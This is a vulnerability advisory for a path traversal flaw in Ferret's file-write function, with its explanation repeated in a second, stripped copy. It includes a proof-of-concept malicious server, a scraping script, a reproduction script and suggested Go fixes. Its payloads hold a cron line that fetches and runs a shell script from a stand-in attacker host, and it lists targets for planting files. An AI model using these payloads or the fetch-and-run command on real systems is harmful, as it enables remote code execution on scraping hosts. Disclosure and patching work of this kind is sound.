Summary
A path traversal vulnerability in Ferret's IO::FS::WRITE standard library function allows a malicious website to write arbitrary files to the filesystem of the machine running Ferret. When an operator scrapes a website that returns filenames containing ../ sequences, and uses those filenames to construct output paths (a standard scraping pattern), the attacker controls both the destination path and the file content. This can lead to remote code execution via cron jobs, SSH authorized_keys, shell profiles, or web shells.
Exploitation
The attacker hosts a malicious website. The victim is an operator running Ferret to scrape it. The operator writes a standard scraping query that saves scraped files using filenames from the website -- a completely normal and expected pattern.
Attack Flow
- The attacker serves a JSON API with crafted filenames containing
../ traversal:
[
{"name": "legit-article", "content": "Normal content."},
{"name": "../../etc/cron.d/evil", "content": "* * * * * root curl http://attacker.com/shell.sh | sh\n"}
]
- The victim runs a standard scraping script:
LET response = IO::NET::HTTP::GET({url: "http://evil.com/api/articles"})
LET articles = JSON_PARSE(TO_STRING(response))
FOR article IN articles
LET path = "/tmp/ferret_output/" + article.name + ".txt"
IO::FS::WRITE(path, TO_BINARY(article.content))
RETURN { written: path, name: article.name }
-
FQL string concatenation produces: /tmp/ferret_output/../../etc/cron.d/evil.txt
-
os.OpenFile resolves ../.. and writes to /etc/cron.d/evil.txt -- outside the intended output directory
-
The attacker achieves arbitrary file write with controlled content, leading to code execution.
Realistic Targets
| Target Path |
Impact |
/etc/cron.d/<name> |
Command execution via cron |
~/.ssh/authorized_keys |
SSH access to the machine |
~/.bashrc or ~/.profile |
Command execution on next login |
/var/www/html/<name>.php |
Web shell |
| Application config files |
Credential theft, privilege escalation |
Proof of Concept
Files
Three files are provided in the poc/ directory:
evil_server.py -- Malicious web server returning traversal payloads:
"""Malicious server that returns filenames with path traversal."""
import json
from http.server import HTTPServer, BaseHTTPRequestHandler
class EvilHandler(BaseHTTPRequestHandler):
def do_GET(self):
if self.path == "/api/articles":
self.send_response(200)
self.send_header("Content-Type", "application/json")
self.end_headers()
payload = [
{"name": "legit-article",
"content": "This is a normal article."},
{"name": "../../tmp/pwned",
"content": "ATTACKER_CONTROLLED_CONTENT\n"
"# * * * * * root curl http://attacker.com/shell.sh | sh\n"},
]
self.wfile.write(json.dumps(payload).encode())
else:
self.send_response(404)
self.end_headers()
if __name__ == "__main__":
server = HTTPServer(("0.0.0.0", 9444), EvilHandler)
print("Listening on :9444")
server.serve_forever()
scrape.fql -- Innocent-looking Ferret scraping script:
LET response = IO::NET::HTTP::GET({url: "http://127.0.0.1:9444/api/articles"})
LET articles = JSON_PARSE(TO_STRING(response))
FOR article IN articles
LET path = "/tmp/ferret_output/" + article.name + ".txt"
LET data = TO_BINARY(article.content)
IO::FS::WRITE(path, data)
RETURN { written: path, name: article.name }
run_poc.sh -- Orchestration script (expects the server to be running separately):
#!/bin/bash
set -e
SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
REPO_ROOT="$(cd "$SCRIPT_DIR/.." && pwd)"
FERRET="$REPO_ROOT/bin/ferret"
echo "=== Ferret Path Traversal PoC ==="
[ ! -f "$FERRET" ] && (cd "$REPO_ROOT" && go build -o ./bin/ferret ./test/e2e/cli.go)
rm -rf /tmp/ferret_output && rm -f /tmp/pwned.txt && mkdir -p /tmp/ferret_output
echo "[*] Running scrape script..."
"$FERRET" "$SCRIPT_DIR/scrape.fql" 2>/dev/null || true
if [ -f "/tmp/pwned.txt" ]; then
echo "[!] VULNERABILITY CONFIRMED: /tmp/pwned.txt written OUTSIDE output directory"
cat /tmp/pwned.txt
fi
Reproduction Steps
# Terminal 1: start malicious server
python3 poc/evil_server.py
# Terminal 2: build and run
go build -o ./bin/ferret ./test/e2e/cli.go
bash poc/run_poc.sh
# Verify: /tmp/pwned.txt exists outside /tmp/ferret_output/
cat /tmp/pwned.txt
Observed Output
=== Ferret Path Traversal PoC ===
[*] Running innocent-looking scrape script...
[{"written":"/tmp/ferret_output/legit-article.txt","name":"legit-article"},
{"written":"/tmp/ferret_output/../../tmp/pwned.txt","name":"../../tmp/pwned"}]
=== Results ===
[*] Files in intended output directory (/tmp/ferret_output/):
-rw-r--r-- 1 user user 46 Mar 27 18:23 legit-article.txt
[!] VULNERABILITY CONFIRMED: /tmp/pwned.txt exists OUTSIDE the output directory!
Contents:
ATTACKER_CONTROLLED_CONTENT
# * * * * * root curl http://attacker.com/shell.sh | sh
Suggested Fix
Option 1: Reject path traversal in IO::FS::WRITE and IO::FS::READ
Resolve the path and verify it doesn't contain .. after cleaning:
func safePath(userPath string) (string, error) {
cleaned := filepath.Clean(userPath)
if strings.Contains(cleaned, "..") {
return "", fmt.Errorf("path traversal detected: %q", userPath)
}
return cleaned, nil
}
Option 2: Base directory enforcement (stronger)
Add an optional base directory that FS operations are jailed to:
func safePathWithBase(base, userPath string) (string, error) {
absBase, _ := filepath.Abs(base)
full := filepath.Join(absBase, filepath.Clean(userPath))
resolved, err := filepath.EvalSymlinks(full)
if err != nil {
return "", err
}
if !strings.HasPrefix(resolved, absBase+string(filepath.Separator)) {
return "", fmt.Errorf("path %q escapes base directory %q", userPath, base)
}
return resolved, nil
}
Root Cause
IO::FS::WRITE in pkg/stdlib/io/fs/write.go passes user-supplied file paths directly to os.OpenFile with no sanitization:
file, err := os.OpenFile(string(fpath), params.ModeFlag, 0666)
There is no:
- Path canonicalization (
filepath.Clean, filepath.Abs, filepath.EvalSymlinks)
- Base directory enforcement (checking the resolved path stays within an intended directory)
- Traversal sequence rejection (blocking
.. components)
- Symlink resolution
The same issue exists in IO::FS::READ (pkg/stdlib/io/fs/read.go):
data, err := os.ReadFile(path.String())
The PATH::CLEAN and PATH::JOIN standard library functions do not mitigate this because they use Go's path package (URL-style paths), not path/filepath, and even path.Join("/output", "../../etc/cron.d/evil") resolves to /etc/cron.d/evil -- it normalizes the traversal rather than blocking it.
References
Summary
A path traversal vulnerability in Ferret's
IO::FS::WRITEstandard library function allows a malicious website to write arbitrary files to the filesystem of the machine running Ferret. When an operator scrapes a website that returns filenames containing../sequences, and uses those filenames to construct output paths (a standard scraping pattern), the attacker controls both the destination path and the file content. This can lead to remote code execution via cron jobs, SSH authorized_keys, shell profiles, or web shells.Exploitation
The attacker hosts a malicious website. The victim is an operator running Ferret to scrape it. The operator writes a standard scraping query that saves scraped files using filenames from the website -- a completely normal and expected pattern.
Attack Flow
../traversal:[ {"name": "legit-article", "content": "Normal content."}, {"name": "../../etc/cron.d/evil", "content": "* * * * * root curl http://attacker.com/shell.sh | sh\n"} ]FQL string concatenation produces:
/tmp/ferret_output/../../etc/cron.d/evil.txtos.OpenFileresolves../..and writes to/etc/cron.d/evil.txt-- outside the intended output directoryThe attacker achieves arbitrary file write with controlled content, leading to code execution.
Realistic Targets
/etc/cron.d/<name>~/.ssh/authorized_keys~/.bashrcor~/.profile/var/www/html/<name>.phpProof of Concept
Files
Three files are provided in the
poc/directory:evil_server.py-- Malicious web server returning traversal payloads:scrape.fql-- Innocent-looking Ferret scraping script:run_poc.sh-- Orchestration script (expects the server to be running separately):Reproduction Steps
Observed Output
Suggested Fix
Option 1: Reject path traversal in
IO::FS::WRITEandIO::FS::READResolve the path and verify it doesn't contain
..after cleaning:Option 2: Base directory enforcement (stronger)
Add an optional base directory that FS operations are jailed to:
Root Cause
IO::FS::WRITEinpkg/stdlib/io/fs/write.gopasses user-supplied file paths directly toos.OpenFilewith no sanitization:There is no:
filepath.Clean,filepath.Abs,filepath.EvalSymlinks)..components)The same issue exists in
IO::FS::READ(pkg/stdlib/io/fs/read.go):The
PATH::CLEANandPATH::JOINstandard library functions do not mitigate this because they use Go'spathpackage (URL-style paths), notpath/filepath, and evenpath.Join("/output", "../../etc/cron.d/evil")resolves to/etc/cron.d/evil-- it normalizes the traversal rather than blocking it.References